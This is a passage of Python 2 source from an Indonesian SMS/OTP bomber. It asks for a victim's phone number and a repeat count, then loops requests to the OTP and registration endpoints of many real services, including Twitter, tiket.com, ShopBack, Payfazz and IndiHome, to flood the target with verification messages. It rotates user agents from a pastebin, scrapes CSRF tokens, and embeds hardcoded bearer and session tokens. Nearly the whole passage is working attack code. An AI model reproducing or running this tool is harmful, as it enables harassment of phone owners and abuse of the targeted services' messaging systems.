hd = {'origin': 'https://sobat.indihome.co.id', 'x-requested-with': 'XMLHttpRequest', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://sobat.indihome.co.id/register', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://sobat.indihome.co.id/ajaxreg/msisdnGetOtp', headers=hd, data={'type': 'hp', 'msisdn': no})
if 'Kode verifikasi telah dikirim' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
idh()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def phd2():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
phd2()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
phd2()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://www.phd.co.id', 'accept': 'application/json, text/javascript, */*; q=0.01', 'x-requested-with': 'XMLHttpRequest', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://www.phd.co.id/en/users/createnewuser', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.phd.co.id/en/users/createNewUser', headers=hd, data={'request_id': '', 'first_name': 'Yayak', 'last_name': 'Yk', 'gender': 'male', 'phone_number': no, 'birthday_d': '', 'birthday_m': '', 'birthday_y': '', 'birthday': '1999-03-01', 'username': 'yayakyk22@40gmail.com', 'password': 'Anjaymanar123$$', 'agreeterms': '1'})
if 'OK' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
phd2()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def spl():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
spl()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
spl()
print
data = {'phone_number': no}
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'accept': 'application/json, text/plain, */*', 'origin': 'https://m.sepulsa.com', 'authorization': 'bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJ3d3cuc2VwdWxzYS5jb20iLCJleHAiOjE1ODQzNTU3MzYsImlhdCI6MTU4Mzc1MDkzNiwic2NvcGUiOnsib3RwIjoicmVxdWVzdCJ9LCJqdGkiOiI2ZFdaMXJQU0tsMVAyVG16TTYxbDdtcmhuSlN1ei03MXJfVXN1Q1dIWDIwIiwiYXVkIjoiYmFnYXN0cmkzMkBnbWFpbC5jb20ifQ.La5TzFdePQg4vUEFfLfzII72u7_tHjd2mrOpG182BNb_8hfAzq1uPIVkpZhg141xVmbNT3SchjE6hSyU8RVPI4lceXGwMELzYsnXYDAbn3Z7GyZP90ZiEFwBIzWD66VHz0ALJRwX7mkuAGaZkVJlcqQEkOjqk4lpJsrtZouQt4xrVqibfJCkWrTYNaFbbw9WdKZNTmowdyOyZQ4JqawNDG59KjzgmwjwWeR8c79rBUDqQY9lDMkGEQR_TBBl3JP2xGpyTlUTy-IDTeP-Ini2ybyTinycbnbcqJoPqbN6pz5jR5WSowRLH7cqb16rv1rqE6aP1Bza_TjoGRFnWw5gtA', 'source': "frigate'", 'user-agent': 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36', 'content-type': 'application/json', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://gaia.sepulsa.com/bumi/otp/request', headers=hd, data=datajson).text
print a
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
spl()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def red():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
red()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
red()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'accept': 'application/json, text/javascript, */*; q=0.01', 'user-agent': '{acak}', 'referer': 'https://m.redbus.id/en/', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://m.redbus.id/api/getOtp?number=' + no + '&cc=62&whatsAppOpted=false', headers=hd)
if 'OTP Sent Successfully' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
red()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def shp():
logo()
r = requests.Session()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: +628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
shp()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
shp()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://www.shopback.co.id/login?redirect=/referral/invite#', headers={'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'cache-control': 'max-age=0', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'user-agent': '{acak}'}).text
b = bs(a, 'html.parser')
c = b.find('input', attrs={'type': 'hidden', 'name': 'nice_try_token'})
d = r.post('https://www.shopback.co.id/account/sendOtp', headers={'accept': 'application/json', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'content-length': '115', 'content-type': 'application/x-www-form-urlencoded', 'http_x_requested_with': 'XMLHttpRequest', 'origin': 'https://www.shopback.co.id', 'referer': 'https://www.shopback.co.id/login?redirect=/referral/invite', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'same-origin', 'user-agent': '{acak}', 'x-requested-with': 'XMLHttpRequest'}, data={'phone': no, 'nice_try_token': c['value'], 'email': 'akasaka1@etlgr.com', 'target': 'signup'}).text
if d == '{"verified":false}':
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
shp()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def pmn():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
pmn()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
pmn()
print
data = {'operationName': 'LoginByPhone', 'variables': {'input': {'country_code': '+62', 'phone_number': no, 'platform': 'web'}}, 'query': 'mutation LoginByPhone($input: LoginByPhoneInput) {\n LoginByPhone(input: $input) {\n token\n __typename\n }\n}\n'}
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'content-length': '256', 'device-type': 'mobile-web', 'origin': 'https://web.pomona.id', 'source': 'mobile-web', 'user-agent': '{acak}', 'content-type': 'application/json', 'accept': '*/*', 'ip': '114.142.170.30', 'referer': 'https://web.pomona.id/masuk', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.pomona.id/graphql', headers=hd, data=datajson)
if '"token":null,"' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
pmn()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def jet():
logo()
print '%s[%s#%s] %sWork jika nomor korban blom daftar JET' % (G1, Y1, G1, W0)
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
jet()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
jet()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Connection': 'keep-alive', 'Content-Length': '127', 'Accept': '*/*', 'Origin': 'http://jet.id', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'http://jet.id/Account/Register', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('http://jet.id/Account/register', headers=hd, data={'fullName': 'Yayakyk', 'email': 'yayakyk@40gmail.com', 'phoneNumber': no, 'address': 'Jakarta', 'password': 'qwerty123', 'confirmPassword': 'qwerty123'}).text
print a
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
jet()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def tw():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tw()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tw()
print
data = {'phone': no, 'use_voice': 'false', 'send_auto_verify_hash': 'false', 'flow_token': 'g;158355847049070709:-1583558508469:16afWpmiAuZzd9TbbmXzWWQ0:0'}
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://mobile.twitter.com', 'x-twitter-client-language': 'en', 'x-csrf-token': '76aee95c7468a28309eed1b1c1f3df98', 'authorization': 'Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA', 'content-type': 'application/json', 'user-agent': '{acak}', 'x-guest-token': '1236159940089098240', 'x-twitter-active-user': 'yes', 'accept': ' */*', 'referer': 'https://mobile.twitter.com/i/flow/signup', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.twitter.com/1.1/onboarding/begin_verification.json', headers=hd, json=datajson).text
print a
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
tw()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def jtk():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
red()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
red()
print
ur = requests.get('https://tjetak.com/register')
parse = bs(ur.text, features='html.parser')
token = parse.find('meta', {'name': 'csrf-token'})['content']
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Host': 'www.tjetak.com', 'content-length': '22', 'accept': '*/*', 'origin': 'https://www.tjetak.com', 'user-agent': '{acak}', 'x-xsrf-token': 'eyJpdiI6IlVwN3JzZmhmMUdUZ3cxQUVzSDlNT2c9PSIsInZhbHVlIjoiSktFQk55enZGbkZFZWEwbTI0dkVTQXE2bFwvYzJYMGlnOU5yNzNQdTlRMmlFT1N3Yk5EU2t6eHIxQ1ZoZ2c4U1IiLCJtYWMiOiJhZjRhMTIxNDdlZjBjZjRjNTcxYjhlODU4NDU2OTg1OGNkZTc0ODliMGMxYWY3YzllOWFiMjQ1NGM1ZjI0NjhlIn0=', 'x-csrf-token': token, 'content-type': 'application/json;charset=UTF-8', 'accept': 'application/json, text/plain, */*', 'x-requested-with': 'XMLHttpRequest', 'save-data': 'on', 'referer': 'https://www.tjetak.com/register', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
a = r.post('https://www.tjetak.com/register/send', headers=hd, json={'phone': no}).text
print a
metu()
def sop():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
sop()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
sop()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Host': 'api.sooplai.com', 'content-length': '23', 'accept': 'application/json, text/plain, */*', 'origin': 'https://www.sooplai.com', 'user-agent': '{acak}', 'content-type': 'application/json', 'referer': 'https://www.sooplai.com/verify/sms?phone=' + no + '®ister=true', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.sooplai.com/customer/register/otp/request', headers=hd, json={'phone': no})
if '' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
sop()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def tkt():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: +628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tkt()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tkt()
data = [{'operationName': 'postOtpGenerateV2', 'variables': {'recipient': no, 'requestType': 'REGISTER_OTP'}, 'query': 'mutation postOtpGenerateV2($recipient: String, $requestType: String, $ignoreRecipient: Boolean, $magicLinkAdditionalParameter: String, $fullName: String, $deviceId: String) {\n otpGenerateV2(recipient: $recipient, requestType: $requestType, ignoreRecipient: $ignoreRecipient, magicLinkAdditionalParameter: $magicLinkAdditionalParameter, fullName: $fullName, deviceId: $deviceId) {\n code\n message\n data {\n exist\n expired\n maskedAccount\n nextAvailableRequest\n trxId\n __typename\n }\n errors\n __typename\n }\n}\n'}]
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://m.tiket.com', 'user-agent': '{acak}', 'content-type': 'application/json', 'referer': 'https://m.tiket.com/login/?ref=https%3A%2F%2Fm.tiket.com%2Fmyaccount', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://gql.tiket.com/', headers=hd, data=datajson)
if 'SUCCESS' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
tkt()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def sek():
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
sek()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
sek()
print
ur = requests.get('https://en.seekmi.com/register')
parse = bs(ur.text, features='html.parser')
token = parse.find('meta', {'name': 'csrf-token'})['content']
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'content-length': '29', 'origin': 'https://en.seekmi.com', 'x-csrf-token': token, 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'accept': '*/*', 'x-requested-with': 'XMLHttpRequest', 'save-data': 'on', 'referer': 'https://en.seekmi.com/register', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
a = r.post('https://en.seekmi.com/ajax/send-otp', headers=hd, data={'phone': no, 'name': 'Bangsat'}).text
print a
metu()
def pfz():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
pfz()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
pfz()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Host': 'api.payfazz.com', 'content-length': '17', 'accept': '*/*', 'origin': 'https://www.payfazz.com', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://www.payfazz.com/register/BEN6ZF74XL', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.payfazz.com/v2/phoneVerifications', headers=hd, data={'phone': no})
if 'phoneVerificationId' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
pfz()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def rwk():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: +628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rwk()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rwk()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Connection': 'keep-alive', 'Content-Length': '77', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Origin': 'https://web.rework.id', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'https://web.rework.id/register', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://web.rework.id/nexmo/sendCode', headers=hd, data={'_token': 'oZauPolVAhritYJwD3UNINtQTeBUGcTDwKZkS8EM', 'mobile_phone': no})
if 'succeed' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
rwk()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def dmt():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
dmt()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
dmt()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Connection': 'keep-alive', 'Content-Length': '97', 'Accept': '*/*', 'Origin': 'https://domaten.com', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'https://domaten.com/signup/', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
a = r.post('https://domaten.com/wp-admin/admin-ajax.php', headers=hd, data={'action': 'ihs_otp_ajax_hook', 'security': '301afb711c', 'data[phone]': no, 'data[country_code]': '62'}).text
print a
metu()
def qcr():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
qcr()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
qcr()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'content-length': '36', 'accept': '*/*', 'origin': 'https://www.qikcircle.com', 'x-requested-with': 'XMLHttpRequest', 'save-data': 'on', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://www.qikcircle.com/Register', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.qikcircle.com/SendSmsOtp', headers=hd, data={'countryCode': '+62', 'phoneNo': no})
if 'OTP Sent' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
